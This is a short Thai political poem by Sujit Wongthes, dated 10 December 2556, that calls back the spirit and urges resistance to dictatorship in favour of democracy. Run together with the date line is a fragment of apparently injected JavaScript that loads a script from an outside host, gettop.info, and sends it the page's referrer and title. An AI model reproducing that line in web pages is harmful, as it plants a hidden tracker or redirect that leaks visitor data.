ขวัญเอ๋ยขวัญมา

ขวัญอย่าร่อนเร่เถลไถล

เผด็จการต้องต้านตีแต่นี้ไป

ชูประชาธิปไตยขวัญมาเอย

 

สุจิตต์ วงษ์เทศ

บ้านช่างหล่อ กรุงธนบุรี

10 ธันวาคม 2556s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;